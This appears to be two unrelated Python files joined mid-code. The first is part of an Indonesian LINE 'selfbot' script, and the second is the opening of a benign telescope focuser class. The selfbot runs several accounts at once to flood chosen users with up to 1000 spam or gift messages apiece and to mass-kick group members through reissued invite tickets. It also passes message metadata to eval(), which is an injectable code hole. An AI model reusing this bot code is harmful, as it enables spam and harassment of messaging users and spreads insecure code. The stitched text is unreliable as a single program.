call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi batas")
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["ARmessage1"]))
ki.sendMessage(midd, str(Setmain["ARmessage1"]))
kk.sendMessage(midd, str(Setmain["ARmessage1"]))
kc.sendMessage(midd, str(Setmain["ARmessage1"]))
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "Anti JS sudah aktif"
else:
protectantijs.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
protectantijs.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Anti JS Sudah Tidak Aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "Ghost sudah aktif"
else:
ghost.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
ghost.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Ghost Sudah Tidak Aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Gho pro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Gho pro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectjoin:
msgs = ""
else:
protectjoin.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectjoin:
protectjoin.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "admin:repeat" or text.lower() == 'admin:repeat':
if msg._from in admin:
wait["delladmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:repeat" or text.lower() == 'staff:repeat':
if msg._from in admin:
wait["dellstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:repeat" or text.lower() == 'bot:repeat':
if msg._from in admin:
wait["dellbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
cl.sendText(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
cl.sendText(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
cl.sendText(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "read on" or text.lower() == 'autoread on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "read off" or text.lower() == 'autoread off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
cl.sendText(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
cl.sendText(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
cl.sendText(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
cl.sendText(msg.to,"Autojoin Tiket dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"★GHOVINBOT★ Blacklist User\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"♣GHOVINBOT♣ Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
cl.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["ARmessage1"] = spl
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg mu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg mu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg mu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg mu :\n\n「 " + str(Setmain["ARmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg mu :\n\n「 " + str(wait["mention"]) + " 」")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
thread1.start()
thread1.join()
except Exception as e:
pass
|
focuser.py
|
import os
from abc import ABCMeta
from abc import abstractmethod
from threading import Event
from threading import Thread
import numpy as np
from scipy.ndimage import binary_dilation
from astropy.modeling import models
from astropy.modeling import fitting
from panoptes.pocs.base import PanBase
from panoptes.utils.time import current_time
from panoptes.utils.images import focus as focus_utils
from panoptes.utils.images import mask_saturated
from panoptes.pocs.utils.plotting import make_autofocus_plot
class AbstractFocuser(PanBase, metaclass=ABCMeta):
"""Base class for all focusers.
Args:
name (str, optional): name of the focuser
model (str, optional): model of the focuser
port (str, optional): port the focuser is connected to, e.g. a device node
camera (pocs.camera.Camera, optional): camera that this focuser is associated with.
timeout (int, optional): time to wait for response from focuser.
initial_position (int, optional): if given the focuser will move to this position
following initialisation.
autofocus_range ((int, int) optional): Coarse & fine focus sweep range, in encoder units
autofocus_step ((int, int), optional): Coarse & fine focus sweep steps, in encoder units
autofocus_seconds (scalar, optional): Exposure time for focus exposures
autofocus_size (int, optional): Size of square central region of image to use, default
500 x 500 pixels.
autofocus_keep_files (bool, optional): If True will keep all images taken during focusing.
If False (default) will delete all except the first and last images from each focus run.
autofocus_take_dark (bool, optional): If True will attempt to take a dark frame before the
focus run, and use it for dark subtraction and hot pixel masking, default True.
autofocus_merit_function (str/callable, optional): Merit function to use as a focus metric,
default vollath_F4
autofocus_merit_function_kwargs (dict, optional): Dictionary of additional keyword arguments
for the merit function.
autofocus_mask_dilations (int, optional): Number of iterations of dilation to perform on the
saturated pixel mask (determine size of masked regions), default 10
autofocus_make_plots (bool, optional: Whether to write focus plots to images folder,
default False.
"""
def __init__(self,
name='Generic Focuser',
model='simulator',
port=None,
camera=None,
timeout=5,
initial_position=None,
autofocus_range=None,
autofocus_step=None,
autofocus_seconds=None,
autofocus_size=None,
autofocus_keep_files=None,
autofocus_take_dark=None,
autofocus_merit_function=None,
autofocus_merit_function_kwargs=None,
autofocus_mask_dilations=None,
autofocus_make_plots=False,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.model = model
self.port = port
self.name = name
self._connected = False
self._serial_number = 'XXXXXX'
self.timeout = timeout
if initial_position is None:
self._position = None
else:
self._position = int(initial_position)
self._set_autofocus_parameters(autofocus_range,
autofocus_step,
autofocus_seconds,
autofocus_size,
autofocus_keep_files,
autofocus_take_dark,
autofocus_merit_function,
autofocus_merit_function_kwargs,
autofocus_mask_dilations,
autofocus_make_plots)
self._autofocus_error = None
self._camera = camera
self.logger.debug('Focuser created: {} on {}'.format(self.name, self.port))
##################################################################################################
# Properties
##################################################################################################
@property
def uid(self):
""" A serial number for the focuser """
return self._serial_number
@property
def is_connected(self):
""" Is the focuser available """
return self._connected
@property
def position(self):
""" Current encoder position of the focuser """
return self._position
@position.setter
def position(self, position):
""" Move focusser to new encoder position """
self.move_to(position)
@property
def camera(self):
"""
Reference to the Camera object that the Focuser is assigned to, if any. A Focuser
should only ever be assigned to one or zero Cameras!
"""
return self._camera
@camera.setter
def camera(self, camera):
if self._camera:
if self._camera != camera:
self.logger.warning(f"{self} already assigned to {self._camera}, "
f"skipping attempted assignment to {camera}!")
else:
self._camera = camera
@abstractmethod
def min_position(self):
""" Get position of close limit of focus travel, in encoder units """
raise NotImplementedError
@abstractmethod
def max_position(self):
""" Get position of far limit of focus travel, in encoder units """
raise NotImplementedError
@abstractmethod
def is_moving(self):
""" True if the focuser is currently moving. """
raise NotImplementedError
@property
def is_ready(self):
# A focuser is 'ready' if it is not currently moving.
return not self.is_moving
@property
def autofocus_error(self):
""" Error message from the most recent autofocus or None, if there was no error."""
return self._autofocus_error
##################################################################################################
# Methods
##################################################################################################
@abstractmethod
def move_to(self, position):
""" Move focuser to new encoder position """
raise NotImplementedError
def move_by(self, increment):
""" Move focuser by a given amount """
return self.move_to(self.position + increment)
def autofocus(self,
seconds=None,
focus_range=None,
focus_step=None,
cutout_size=None,
keep_files=None,
take_dark=None,
merit_function=None,
merit_function_kwargs=None,
mask_dilations=None,
coarse=False,
make_plots=None,
blocking=False):
"""
Focuses the camera using the specified merit function. Optionally performs
a coarse focus to find the approximate position of infinity focus, which
should be followed by a fine focus before observing.
Args:
seconds (scalar, optional): Exposure time for focus exposures, if not
specified will use value from config.
focus_range (2-tuple, optional): Coarse & fine focus sweep range, in
encoder units. Specify to override values from config.
focus_step (2-tuple, optional): Coarse & fine focus sweep steps, in
encoder units. Specify to override values from config.
cutout_size (int, optional): Size of square central region of image
to use, default 500 x 500 pixels.
keep_files (bool, optional): If True will keep all images taken
during focusing. If False (default) will delete all except the
first and last images from each focus run.
take_dark (bool, optional): If True will attempt to take a dark frame
before the focus run, and use it for dark subtraction and hot
pixel masking, default True.
merit_function (str/callable, optional): Merit function to use as a
focus metric, default vollath_F4.
merit_function_kwargs (dict, optional): Dictionary of additional
keyword arguments for the merit function.
mask_dilations (int, optional): Number of iterations of dilation to perform on the
saturated pixel mask (determine size of masked regions), default 10
coarse (bool, optional): Whether to perform a coarse focus, otherwise will perform
a fine focus. Default False.
make_plots (bool, optional): Whether to write focus plots to images folder. If not
given will fall back on value of `autofocus_make_plots` set on initialisation,
and if it wasn't set then will default to False.
blocking (bool, optional): Whether to block until autofocus complete, default False.
Returns:
threading.Event: Event that will be set when autofocusing is complete
Raises:
ValueError: If invalid values are passed for any of the focus parameters.
"""
self.logger.debug('Starting autofocus')
assert self._camera.is_connected, self.logger.error("Camera must be connected for autofocus!")
assert self.is_connected, self.logger.error("Focuser must be connected for autofocus!")
if not focus_range:
if self.autofocus_range:
focus_range = self.autofocus_range
else:
raise ValueError(
"No focus_range specified, aborting autofocus of {}!".format(self._camera))
if not focus_step:
if self.autofocus_step:
focus_step = self.autofocus_step
else:
raise ValueError(
"No focus_step specified, aborting autofocus of {}!".format(self._camera))
if not seconds:
if self.autofocus_seconds:
seconds = self.autofocus_seconds
else:
raise ValueError(
"No focus exposure time specified, aborting autofocus of {}!", self._camera)
if not cutout_size:
if self.autofocus_size:
cutout_size = self.autofocus_size
else:
raise ValueError(
"No focus thumbnail size specified, aborting autofocus of {}!", self._camera)
if keep_files is None:
if self.autofocus_keep_files:
keep_files = True
else:
